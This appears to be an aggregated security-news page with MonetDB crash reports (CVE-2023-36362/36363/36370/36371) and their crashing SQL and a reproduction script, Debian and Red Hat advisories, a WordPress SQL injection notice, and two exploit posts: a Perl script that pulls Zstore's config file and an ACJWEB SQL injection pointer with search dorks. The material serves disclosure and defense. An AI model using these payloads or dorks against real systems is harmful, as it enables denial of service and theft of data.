An issue in the GDKfree component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

**Describe the bug**  
MonetDB server 11.46.0 crashes in GDKfree after executing SQL statements through mclient.

**To Reproduce**

1.  Use mclient to connect MonetDB server;
2.  Try to execute the following SQL statements **multiple times**. Sometimes they will crash the server. (On my machine, the server crashes after repeating executing these SQLs with at most 4 times)

DROP SCHEMA test CASCADE;
CREATE SCHEMA test;
SET SCHEMA test;
CREATE TABLE src (src\_c1\_pkey INT, c1 VARCHAR(100));
START TRANSACTION;
DELETE   FROM src;
ALTER TABLE src DROP src\_c1\_pkey;
INSERT INTO src VALUES(1,1),(2,2),(3,3),(4,4),(6,6),(7,7),(8,8),(9,9),(10,10);
COMMIT;
SET SCHEMA sys;
DROP SCHEMA test CASCADE;
CREATE SCHEMA test;

**Expected behavior**  
Executing statements successfully or throwing errors, instead of breaking down the whole MonetDB server.

**Backtrace**

    #0 0x7f280338000b (gsignal+0xcb)
    #1 0x7f280335f859 (abort+0x12b)
    #2 0x7f28033ca26e (__fsetlocking+0x42e)
    #3 0x7f28033d22fc (pthread_attr_setschedparam+0x54c)
    #4 0x7f28033d3f6d (pthread_attr_setschedparam+0x21bd)
    #5 0x7f280414f765 (GDKfree+0x25)
    #6 0x7f280377af7b (destroy_delta+0x7b)
    #7 0x7f280377576d (destroy_col+0x2d)
    #8 0x7f2803745345 (column_destroy+0x45)
    #9 0x7f2803761ec2 (list_destroy2+0xa2)
    #10 0x7f2803760d14 (ol_destroy+0x34)
    #11 0x7f2803745450 (table_destroy+0x90)
    #12 0x7f280375ec17 (objectversion_destroy+0x77)
    #13 0x7f280375eb4f (os_destroy+0xcf)
    #14 0x7f2803750cdc (schema_destroy+0x7c)
    #15 0x7f280375ec17 (objectversion_destroy+0x77)
    #16 0x7f280376065d (objectversion_destroy_recursive+0x3d)
    #17 0x7f2803760345 (tc_gc_objectversion+0x75)
    #18 0x7f280374a307 (store_pending_changes+0x307)
    #19 0x7f280374ea87 (sql_trans_commit+0x567)
    #20 0x7f2803759353 (sql_trans_end+0x83)
    #21 0x7f280379c10c (mvc_commit+0x4fc)
    #22 0x7f280369d564 (SQLengine_+0x284)
    #23 0x7f280369c343 (SQLengine+0x23)
    #24 0x7f2803a2b6cf (runScenario+0x4f)
    #25 0x7f2803a2c16c (MSscheduleClient+0x68c)
    #26 0x7f2803ad3c2b (doChallenge+0xfb)
    #27 0x7f2804152ba0 (THRstarter+0x100)
    #28 0x7f28041c2cc4 (thread_starter+0x34)
    #29 0x7f2803537609 (start_thread+0xd9)
    #30 0x7f280345c133 (clone+0x43)
    

**Software versions**

*   MonetDB server version: 11.46.0 (hg id: 63a42c2) (pulled from the master branch)
*   MonetDB client version: mclient, version 11.48.0 (hg id: 63a42c2)
*   OS and version: ubuntu 20.04
*   Self-installed and compiled. The command line of compilation: CC=clang-12 CXX=clang++-12 cmake /root/monetdb_master -DCMAKE_BUILD_TYPE=RelWithDebInfo

**Issue labeling**  
bug

**Additional context**  
The MonetDB here runs in-memory database. The command line of starting MonetDB server is mserver5 --in-memory.

If the crash cannot be reproduced easily, please tell me. I will try to provide the whole steps to trigger the crash as possible.

Could **not** reproduce the crash with MonetDB 5 server v11.45.17 (Sep2022-SP3).  
We will add a test case to see if any memory leaks are detected.

I write a bash script to reproduce. It use the docker image of MonetDB v11.45.17 (Sep2022-SP3). Maybe it can help to reproduce the crash.

#!/bin/bash

######################################################
#\# Build the image of MonetDB and start a container.  
######################################################
docker pull monetdb/monetdb:Sep2022-SP3
docker run -e MDB\_DB\_ADMIN\_PASS=monetdb -d -p 50000:50000 --name monetdb monetdb/monetdb:Sep2022-SP3
docker container restart monetdb

echo -e "user=monetdb\\npassword=monetdb" | docker exec -i monetdb tee /root/.monetdb

echo "Waiting the monetdb server to start..."
while ! docker exec monetdb mclient monetdb \> /dev/null 2> /dev/null
do
    echo -n "."
done

docker exec monetdb dnf install procps-ng -y

#################################################
#\# Get current PID of the mserver5 process. 
#\# as the mserver5 will be restart automatically 
#\# after crashing in the docker container,
#\# we check a crash by comparing the PIDs.
#################################################
echo -ne "Check PID of mserver5: \\033\[0;32m\\033\[1m"
docker exec monetdb pidof mserver5
echo -ne "\\033\[0m"
oldPid=$(docker exec monetdb pidof mserver5)

#\# Loop the SQL test cases.
for (( i\=0; i<200; ++i ))
do

echo -n "."

echo "DROP SCHEMA test CASCADE;
CREATE SCHEMA test;
SET SCHEMA test;
CREATE TABLE src (src\_c1\_pkey INT, c1 VARCHAR(100));
START TRANSACTION;
DELETE   FROM src;
ALTER TABLE src DROP src\_c1\_pkey;
INSERT INTO src VALUES(1,1),(2,2),(3,3),(4,4),(6,6),(7,7),(8,8),(9,9),(10,10);
COMMIT;
SET SCHEMA sys;
DROP SCHEMA test CASCADE;
CREATE SCHEMA test;
" | docker exec -i monetdb mclient monetdb 2>&1 | grep --color=always "unexpected end of file\\|Challenge string is not valid, it is empty" && break

done

#############################################
#\# Check whether some errors occurred.
#############################################
if ! docker exec monetdb mclient monetdb
then
    echo "The server or client seems unavailable".
else
    echo -ne "Check PID of mserver5: \\033\[0;32m\\033\[1m"
    docker exec monetdb pidof mserver5
    echo -ne "\\033\[0m"
    nowPid=$(docker exec monetdb pidof mserver5)
    
    if (( nowPid != oldPid ))
    then
        echo "Different PIDs. Maybe a crash occurred?"
    else
        echo "Everything seems ok... Maybe not a bug."
    fi
fi

CVE-2023-36371: MonetDB server 11.46.0 crashes in `GDKfree` · Issue #7385 · MonetDB/MonetDB

An issue in the gc_col component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

**Describe the bug**  
MonetDB server 11.46.0 crashes at gc_col after executing SQL statements through ODBC.

START TRANSACTION;
CREATE TEMPORARY TABLE t1 (keyc INT, c1 VARCHAR(100), c2 VARCHAR(100), PRIMARY KEY(keyc));
CREATE TABLE c1(c2 DECIMAL(9,4) NOT NULL);
SAVEPOINT a\_a;
TRUNCATE TABLE t1;
DELETE FROM w;
COMMIT;
SELECT 1;

**Expected behavior**  
Executing statements successfully or throwing errors, instead of breaking down the whole MonetDB server.

    #0 0x7ff2e7285dd6 (gc_col+0x26)
    #1 0x7ff2e7282cd5 (tc_gc_col+0x15)
    #2 0x7ff2e7251307 (store_pending_changes+0x307)
    #3 0x7ff2e7255a87 (sql_trans_commit+0x567)
    #4 0x7ff2e7260353 (sql_trans_end+0x83)
    #5 0x7ff2e72a310c (mvc_commit+0x4fc)
    #6 0x7ff2e71a4564 (SQLengine_+0x284)
    #7 0x7ff2e71a3343 (SQLengine+0x23)
    #8 0x7ff2e75326cf (runScenario+0x4f)
    #9 0x7ff2e753316c (MSscheduleClient+0x68c)
    #10 0x7ff2e75dac2b (doChallenge+0xfb)
    #11 0x7ff2e7c59ba0 (THRstarter+0x100)
    #12 0x7ff2e7cc9cc4 (thread_starter+0x34)
    #13 0x7ff2e703e609 (start_thread+0xd9)
    #14 0x7ff2e6f63133 (clone+0x43)
    

**Additional context**  
The MonetDB here runs in-memory database. The command line of starting MonetDB server is mserver5 --in-memory.

If the crash cannot be reproduced easily, please tell me. I will try to provide the whole steps to trigger the crash as possible.

CVE-2023-36370: MonetDB server 11.46.0 crashes at `gc_col` · Issue #7382 · MonetDB/MonetDB

An issue in the __nss_database_lookup component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

**Describe the bug**  
MonetDB server 11.46.0 crashes at __nss_database_lookup after executing SQL statements through mclient.

**To Reproduce**  
Use the mclient binary to connect MonetDB server and execute the following stmts:

create schema test;
drop schema test cascade;
create schema test;
set schema test;
CREATE TABLE test (sect int NOT NULL auto\_increment, PRIMARY KEY (sect));
create trigger count after delete on test for each row insert into test values (1);
delete from test;

**Expected behavior**  
Executing statements successfully or throwing errors, instead of breaking down the whole MonetDB server.

    #0 0x7f76ea76ebee (__nss_database_lookup+0x2078e)
    #1 0x7f76eadf66fd (OPTemptybindImplementation+0x4fd)
    #2 0x7f76eae124f1 (OPTwrapper+0x191)
    #3 0x7f76eacdae23 (optimizeMALBlock+0x1a3)
    #4 0x7f76ea98391f (SQLoptimizeQuery+0x1df)
    #5 0x7f76ea94c57b (SQLparser+0x7eb)
    #6 0x7f76ea94b87b (SQLengine_+0x59b)
    #7 0x7f76ea94a343 (SQLengine+0x23)
    #8 0x7f76eacd96cf (runScenario+0x4f)
    #9 0x7f76eacda16c (MSscheduleClient+0x68c)
    #10 0x7f76ead81c2b (doChallenge+0xfb)
    #11 0x7f76eb400ba0 (THRstarter+0x100)
    #12 0x7f76eb470cc4 (thread_starter+0x34)
    #13 0x7f76ea7e5609 (start_thread+0xd9)
    #14 0x7f76ea70a133 (clone+0x43)
    

**Additional context**  
The MonetDB here runs in-memory database. The command line of starting MonetDB server is mserver5 --in-memory.

Using the mlient or unixODBC with command line like isql monetdb -e can reproduce the crash. But command line isql monetdb (without the -e option) cannot reproduce it.

CVE-2023-36363: MonetDB server 11.46.0 crashes at `__nss_database_lookup` · Issue #7384 · MonetDB/MonetDB

An issue in the rel_sequences component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

**Describe the bug**  
MonetDB server 11.46.0 crashes in rel_sequences after executing SQL statements through mclient.

**Expected behavior**  
Executing statements successfully or throwing errors, instead of breaking down the whole MonetDB server.

    #0 0x7ff49bdd36d0 (rel_sequences+0x830)
    #1 0x7ff49bdb10c1 (rel_semantic+0xc1)
    #2 0x7ff49bc8eb53 (sql_symbol2relation+0x73)
    #3 0x7ff49bca810d (SQLparser+0x37d)
    #4 0x7ff49bca787b (SQLengine_+0x59b)
    #5 0x7ff49bca6343 (SQLengine+0x23)
    #6 0x7ff49c0356cf (runScenario+0x4f)
    #7 0x7ff49c03616c (MSscheduleClient+0x68c)
    #8 0x7ff49c0ddc2b (doChallenge+0xfb)
    #9 0x7ff49c75cba0 (THRstarter+0x100)
    #10 0x7ff49c7cccc4 (thread_starter+0x34)
    #11 0x7ff49bb41609 (start_thread+0xd9)
    #12 0x7ff49ba66133 (clone+0x43)
    

**Additional context**  
The MonetDB here runs in-memory database. The command line of starting MonetDB server is mserver5 --in-memory.

CVE-2023-36362: MonetDB server 11.46.0 crashes in `rel_sequences` · Issue #7387 · MonetDB/MonetDB

Debian Linux Security Advisory 5437-1 - Gregor Kopf of Secfault Security GmbH discovered that HSQLDB, a Java SQL database engine, allowed the execution of spurious scripting commands in .script and .log files. Hsqldb supports a "SCRIPT" keyword which is normally used to record the commands input by the database admin to output such a script. In combination with LibreOffice, an attacker could craft an odb containing a "database/script" file which itself contained a SCRIPT command where the contents of the file could be written to a new file whose location was determined by the attacker.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5437-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyJune 21, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : hsqldbCVE ID         : CVE-2023-1183Gregor Kopf of Secfault Security GmbH discovered that HSQLDB, a Java SQLdatabase engine, allowed the execution of spurious scripting commands in.script and .log files. Hsqldb supports a "SCRIPT" keyword which is normallyused to record the commands input by the database admin to output such ascript. In combination with LibreOffice, an attacker could craft an odbcontaining a "database/script" file which itself contained a SCRIPT commandwhere the contents of the file could be written to a new file whose locationwas determined by the attacker.For the oldstable distribution (bullseye), this problem has been fixedin version 2.5.1-1+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 2.7.1-1+deb12u1.We recommend that you upgrade your hsqldb packages.For the detailed security status of hsqldb please refer toits security tracker page at:https://security-tracker.debian.org/tracker/hsqldbFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmSTb1tfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeSyRw//XKFjC4nEe3cC0vYfO6RvImJOauQahx63tWCfT/cMcsP/U6+4D41BIbG4Ge1HUeV73Vz8Vq0+9w+8x/+HrlkLF7i6j1t4BpXyFIBttmQPS247RWtbOlwRlI+AHwgyEnFNd5M6AcXYpcVVeuG4P0070PyTPg2ZD3FNqWPl5VbeMDk15a17SB8PpduD8HkTySKMpQ54IXOvzPQJG1R3IDugl8+tAiF4hwIdaL0mMMNtWbvd+R/SXt+T0XNBxyvzjbojsUz+s60mHU/4Tp+efVvn0TUjU0mQhGzBWENPL1mNElj41a6qetwhyJZ6dL/DXPn2Z7gmstFFg+yJQ62KfWXl/KwtSFmlqlgaF314i/qnWkJqPpdZShDK5pITcf4OMUWFId1ZoJ6/Wbq3zRqLDjCOSoxLHID3jG8UspjoVtN2XcbEbTtmy0h6YTeHT1xe+OPvYe1SBo8pZkI1z8UFa1+gbUTgbraF1fi+Oz8oP8MVexhbvKoL2gGjcJOv50G1oy9P6JcDeEhIdMJeNJlDFoD/dI3V6DHLrskEs1/pP5jcozbSYvGSvm5IomKA5GXJm336S1szk01PmtqPbJ81yp1ZKrScSywLwK9p0vWxqeP8fqduDW3o/JhXRp2AKO5blMufbOh/w5E9ZiJQhuybgG9eSj4SD6zRTgvbF8MQL6wsx/s==UcJ1-----END PGP SIGNATURE-----

Debian Security Advisory 5437-1

Red Hat Security Advisory 2023-3740-01 - This release of Camel for Spring Boot 3.20.1.P1 serves as a replacement for Camel for Spring Boot 3.20.1 and includes bug fixes and enhancements, which are documented in the Release Notes linked in the References. The purpose of this text-only errata is to inform you about the security issues fixed. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Integration Camel for Spring Boot 3.20.1 Patch 1 release security update  
Advisory ID:       RHSA-2023:3740-01  
Product:           Red Hat Integration  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3740  
Issue date:        2023-06-21  
CVE Names:         CVE-2023-20883 CVE-2023-24815   
=====================================================================

1. Summary:

Red Hat Integration Camel for Spring Boot 3.20.1 Patch 1 release and  
security update is now available.

Red Hat Product Security has rated this update as having an impact of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

This release of Camel for Spring Boot 3.20.1.P1 serves as a replacement for  
Camel for Spring Boot 3.20.1 and includes bug fixes and enhancements, which  
are documented in the Release Notes linked in the References. The purpose  
of this text-only errata is to inform you about the security issues fixed.

Security Fix(es):

* vertx-web: StaticHandler disclosure of classpath resources on Windows  
when mounted on a wildcard route (CVE-2023-24815)

* spring-boot: Spring Boot Welcome Page DoS Vulnerability (CVE-2023-20883)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2209342 - CVE-2023-20883 spring-boot: Spring Boot Welcome Page DoS Vulnerability  
2209400 - CVE-2023-24815 vertx-web: StaticHandler disclosure of classpath resources on Windows when mounted on a wildcard route

5. References:

https://access.redhat.com/security/cve/CVE-2023-20883  
https://access.redhat.com/security/cve/CVE-2023-24815  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=red.hat.integration&version=2023-Q2

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJNxFdzjgjWX9erEAQjgyg/8DIsEGsp2KcG+EMZiGqVlBaafePfT3gP6  
tVOVD4jqsxQYLNa05/IZQtW5Do+0q1vF+ElMq073BgiTXzx6dvD2gppr+Z4DJfAt  
tvigw2uRofa+ycyL7LxtguxuwUEOrroEiCSqV5itQ/VKiPGoWbQ9WW7LJqPoL/l3  
bOywYNbjQ9DIruTwaWt5YbdzYeCPiyh1lW+pG5wzci7m2DZoRu4mR+cV+XsY0XRS  
cGS5UtE60bXpid5CUFVKno26ArmY1twpb3hB8cX2xrjwa9xOpfteffdqp6bLM9Fv  
CfnjBSJLRiOIucR2d3jgWaMFsQlfpxRGfp/1fT9bI3RJ5RO2p0BHUS4ECAeCXCNW  
PhrmMfHKthHeQKSNpWPTKt+XgO1jE8qMATic5/hB3PL6w2KqFs8mSWePrhD3Vo1J  
SktXfBa3Sd1V3TbOz2otcifMCzg7ry95+sSR72Zpu/nQfP+keOsian98FdRlGzV5  
Hh2l98+YgdtmNFp4rwrVCcOLluv/rzt7oG1UBYVM9ATV50fXqtU8KR7YRS3ooNj3  
kaHBDTsUpqdl+iN25jpeDooLZkCKPcGsm7Pg6bUFjYkIHavxFwve9hVxXp9yiVL6  
446ILywCJFF2/hsD7o0Pe4r6Gc9le6zh7C/6kqa+hb1k9aGtcwFnMaNK1H2Y3zni  
4j/W1dDwivU=  
=xseK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3740-01

Debian Linux Security Advisory 5436-1 - Gregor Kopf of Secfault Security GmbH discovered that HSQLDB, a Java SQL database engine, allowed the execution of spurious scripting commands in .script and .log files. Hsqldb supports a "SCRIPT" keyword which is normally used to record the commands input by the database admin to output such a script. In combination with LibreOffice, an attacker could craft an odb containing a "database/script" file which itself contained a SCRIPT command where the contents of the file could be written to a new file whose location was determined by the attacker.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5436-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyJune 21, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : hsqldb1.8.0CVE ID         : CVE-2023-1183Gregor Kopf of Secfault Security GmbH discovered that HSQLDB, a Java SQLdatabase engine, allowed the execution of spurious scripting commands in.script and .log files. Hsqldb supports a "SCRIPT" keyword which is normallyused to record the commands input by the database admin to output such ascript. In combination with LibreOffice, an attacker could craft an odbcontaining a "database/script" file which itself contained a SCRIPT commandwhere the contents of the file could be written to a new file whose locationwas determined by the attacker.For the oldstable distribution (bullseye), this problem has been fixedin version 1.8.0.10+dfsg-10+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.8.0.10+dfsg-11+deb12u1.We recommend that you upgrade your hsqldb1.8.0 packages.For the detailed security status of hsqldb1.8.0 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/hsqldb1.8.0Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmSTbaNfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeQVTg//R6xPJvWIgXS52aaxr0ZAsjmmKgROqyRekmbNWv0tHiPvctpk1NcxRhkqSbUZid8oYTlnOqq3AY4/22LoW6KbgCun+ZtAF0sFU4tKI8LjLFDQREJcZ5eB5Sv7o1BvOSH9MVE7EZv5CFKe0lAyfbD51Cys58sKAf4JTlbO3wEigi4IYTrxAiQzcV/Eb0a1dYKsQP5kh5mTlcL7nLC5wKWBaGQVXGI/lXum4C2t/rLCQyMkgVNedaXmkNK6zk5iyAZ1VVDIAHw/nPiAAf6bMvzUmpQ3GBOmeyZ8X3XA4xJw9Y4nywKUNBZzt4ndpuCNyK+6pK9zHpt7zrsiJXRBNL6a+Fjuf66Ral9zjgAsCbQYEE5MgTRbEOUQaXInyEvKfXtJk1uOMC9Z8kwDQSLYYbfOskuNTarRwoZxRTj1ZVHjfCsaXY3UMzmBZZVyuu18jdkZpFlf4B8lhsPUZAL2csQTD8AIsfeXYHaCA5/tTeJhAxNh0UvbLzDYNpK2UeBJiOrLY7qNyzQv2y+pG5o7XPcG409mU3t2kF7gXBi3ntfImHFkyNgusUU21CHPQLOT9cnt05aSij2H1iEWs3iYX8v67thNSYb1fwc7+yXpAgMx7uBtR97gUxJr/ghvwG9TZcudFj6B7qyAoA7x+3gbt0ULSAZsTxZgQXsu0t72GKqK/X0==rINr-----END PGP SIGNATURE-----

Debian Security Advisory 5436-1

Auth. (subscriber+) SQL Injection (SQLi) vulnerability in RapidLoad RapidLoad Power-Up for Autoptimize plugin <= 1.6.35 versions.

**Solution**

Fixed 

Update the WordPress RapidLoad Power-Up for Autoptimize plugin to the latest available version (at least 1.6.36).

Le Ngoc Anh discovered and reported this SQL Injection vulnerability in WordPress RapidLoad Power-Up for Autoptimize Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information. This vulnerability has been fixed in version 1.6.36.

**Other vulnerabilities in this plugin**

 0 present

 3 patched

View all

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-47593: WordPress RapidLoad Power-Up for Autoptimize plugin <= 1.6.35 - SQL Injection - Patchstack

Zstore version 6.5.4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Zstore version 6.5.4 Database Disclosure Exploit                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://github.com/leon-mbs/zstore/releases/tag/6.5.4                                                              |    
| # Dork      : "Zippy склад"                                                                                                      |  
====================================================================================================================================

poc :

[-] Download database backup :

    This file may disclose sensitive information. This information can be used to launch further attacks.

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
# Author : indoushka

use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] Zstore version 6.5.4  Database Disclosure [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[+] Author : indoushka \n\n";  
print "[-] How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/db.sql \n";  
print "[+] usage2 : perl $0 localhost /db.sql \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="config/config.ini";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/db.sql");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/.env\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Zstore 6.5.4 Database Disclosure

ACJWEB DESIGNER version 1.0 suffers from a remote SQL injection vulnerability.

    ======================================================================================|| # Title     : ACJWEB DESIGNER 1.0 - SQL Injection Vulnerability                     || # Author    : indoushka                                                             |                                            | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |                                          | # Vendor    : aluizio81@gmail.com                                                   || # Drok      : inurl:sobre.php?id=                                                   |======================================================================================|poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : http://127.0.0.1/asmac.combr/sobre.php?id= <======inject here[+] login = login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        =======================================================================================================================================

Tag

#sql